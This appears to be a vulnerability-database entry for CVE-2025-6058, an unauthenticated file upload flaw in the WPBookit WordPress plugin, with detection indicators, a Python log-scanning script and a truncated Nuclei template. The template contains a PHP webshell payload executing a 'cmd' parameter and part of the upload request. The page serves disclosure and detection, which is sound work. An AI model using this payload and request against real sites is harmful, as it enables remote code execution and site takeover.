CVE-2025-6058
Published: 2025-07-12
Priority: P1 · 78 · Severity: critical · CVSS 3.1 base score 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Exploit: available (see the Nuclei template below) · EPSS: 5.65% (92.0th percentile)
The WPBookit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the image_upload_handle() function hooked via the 'add_booking_type' route in all versions up to, and including, 1.0.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| iqonic | wpbookit | < 1.0.5 | 1.0.5 |
| iqonicdesign | wpbookit | <= 1.0.4 | — |
Detection & IOCs (extracted from sources)
- Alert on GET requests to /wp-content/uploads/**/*.php that carry a `cmd` query parameter: this is the uploaded webshell being invoked after a successful upload.
- A successful upload is indicated by an admin-ajax.php response whose JSON body contains both the 'success' and 'status' strings.
- Confirm RCE by matching the output of `id` in the HTTP response body with the regex: uid=\d+\([^)]+\) gid=\d+\([^)]+\) groups=\d+\([^)]+\)
- The upload request needs no credentials or session token; the vulnerability is exploitable by unauthenticated attackers.
- Affected versions are 1.0.4 and below; the vulnerable function is image_upload_handle(), reached via the 'add_booking_type' route.
- Uploaded PHP webshells land under /wp-content/uploads/ in a year/month subdirectory (YYYY/MM/), so the upload path is time-dependent and detection must match the directory dynamically rather than a fixed path.
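The indicators above, turned into runnable checks as an added example (this is not code from this page, the plugin vendor, or the Nuclei template): a version gate against the fixed release from the Affected table, a matcher for webshell hits in combined-format access-log lines, a JSON check for the admin-ajax.php upload response, and the `id`-output regex. The log format, field names and all sample data are constructed for illustration.

```python
"""Detection helpers for CVE-2025-6058 (WPBookit <= 1.0.4 arbitrary file upload).

Added example, not code from the page or from the plugin. The access-log
format (Apache/nginx "combined"), the README sample and every log/response
line below are constructed, not captured from a real site.
"""
import json
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

FIXED_VERSION = (1, 0, 5)  # from the Affected table: fixed in 1.0.5


def parse_version(v: str) -> tuple:
    """'1.0.4' -> (1, 0, 4); ignores a trailing suffix such as '-beta'."""
    core = re.match(r"\d+(?:\.\d+)*", v.strip())
    if not core:
        raise ValueError(f"unparseable version: {v!r}")
    return tuple(int(p) for p in core.group(0).split("."))


def is_affected(version: str) -> bool:
    """True for every release below the fix, i.e. <= 1.0.4."""
    return parse_version(version) < FIXED_VERSION


def stable_tag(readme_txt: str) -> Optional[str]:
    """Read 'Stable tag:' from a WordPress plugin README.txt (the file the
    Nuclei template fetches to fingerprint the plugin)."""
    m = re.search(r"^Stable tag:\s*(\S+)", readme_txt, re.M | re.I)
    return m.group(1) if m else None


# Indicator 1: GET to a .php file anywhere under wp-content/uploads with a
# 'cmd' parameter. The YYYY/MM directory is time-dependent, so any depth of
# subdirectory is accepted instead of a fixed path.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r"(?P<status>\d{3}) (?P<size>\S+)"
)
WEBSHELL_PATH_RE = re.compile(r"^/wp-content/uploads/(?:[^/]+/)*[^/]+\.php$", re.I)


def webshell_hit(log_line: str) -> Optional[tuple]:
    """Return (ip, path, cmd) when the line is a webshell invocation, else None."""
    m = LOG_RE.match(log_line)
    if not m or m.group("method") != "GET":
        return None
    parts = urlsplit(m.group("target"))
    qs = parse_qs(parts.query, keep_blank_values=True)  # 'cmd=' still counts
    if not WEBSHELL_PATH_RE.match(parts.path) or "cmd" not in qs:
        return None
    return (m.group("ip"), parts.path, qs["cmd"][0])


def scan_access_log(lines) -> list:
    return [hit for hit in map(webshell_hit, lines) if hit is not None]


# Indicator 2: the admin-ajax.php reply to a successful upload carries both
# 'success' and 'status'. Checked on parsed JSON keys rather than raw text so
# an error message that merely mentions the words does not match.
def looks_like_upload_success(body: str) -> bool:
    try:
        obj = json.loads(body)
    except ValueError:
        return False
    return isinstance(obj, dict) and "success" in obj and "status" in obj


# Indicator 3: `id` output in a response body proves command execution.
ID_OUTPUT_RE = re.compile(r"uid=\d+\([^)]+\) gid=\d+\([^)]+\) groups=\d+\([^)]+\)")


def confirms_rce(body: str) -> bool:
    return ID_OUTPUT_RE.search(body) is not None


# Constructed sample data.
SAMPLE_README = "=== WPBookit ===\nContributors: example\nStable tag: 1.0.4\n"
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Jul/2025:10:15:01 +0000] "GET /wp-content/uploads/2025/07/abcde.php?cmd=id HTTP/1.1" 200 512',
    '198.51.100.4 - - [12/Jul/2025:10:15:05 +0000] "GET /wp-content/uploads/2025/07/photo.jpg HTTP/1.1" 200 88231',
    '203.0.113.7 - - [12/Jul/2025:10:15:09 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 64',
    '203.0.113.7 - - [12/Jul/2025:10:16:00 +0000] "GET /wp-content/uploads/2024/11/x.php?cmd=uname%20-a HTTP/1.1" 200 77',
]
SAMPLE_AJAX_BODY = '{"success":true,"status":"ok","id":12}'
SAMPLE_SHELL_BODY = "WPBookit uid=33(www-data) gid=33(www-data) groups=33(www-data)\n"

if __name__ == "__main__":
    tag = stable_tag(SAMPLE_README)
    print("stable tag:", tag, "affected:", is_affected(tag))
    print("webshell hits:", scan_access_log(SAMPLE_LOG))
    print("upload success:", looks_like_upload_success(SAMPLE_AJAX_BODY))
    print("rce confirmed:", confirms_rce(SAMPLE_SHELL_BODY))
```

The path matcher deliberately ignores the year/month segment; a rule pinned to the current month misses a shell dropped earlier that is only being invoked now (the fourth sample line). The version gate treats anything below 1.0.5 as affected, which matches both rows of the Affected table.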
No detection rules found.
Nuclei
CVE-2025-6058 [CRITICAL] WPBookit <= 1.0.4 - Unauthenticated Arbitrary File Upload (nuclei · CVSS 9.8)
The template as rendered on this page is truncated: it begins inside the variables block and stops inside the multipart body of the second request.

```yaml
variables:
  # first variable: the PHP webshell payload; its key name and the start of
  # its value are cut off in this page's copy of the template
  WPBookit "; if(isset($_GET["cmd"])){ echo ""; system($_GET["cmd"]); echo ""; } ?>'
  cmd: 'id'
  month: '{{date_time("%Y/%M")}}'
  filename: "{{to_lower(rand_base(5))}}"
  string: "{{to_lower(rand_base(8))}}"

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET /wp-content/plugins/wpbookit/README.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "WPBookit")'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="action"

        wpb_ajax_post
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="route_name"

        add_booking_type
        # (remainder of the multipart body and the third request are not shown on this page)
```
References
- https://plugins.trac.wordpress.org/browser/wpbookit/trunk/core/admin/classes/controllers/class.wpb-booking-type-controller.php#L455
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3314288%40wpbookit&new=3314288%40wpbookit&sfp_email=&sfph_mail=
- https://www.wordfence.com/threat-intel/vulnerabilities/id/1d779ad1-fdbe-444c-85c5-99146a1a03d8?source=cve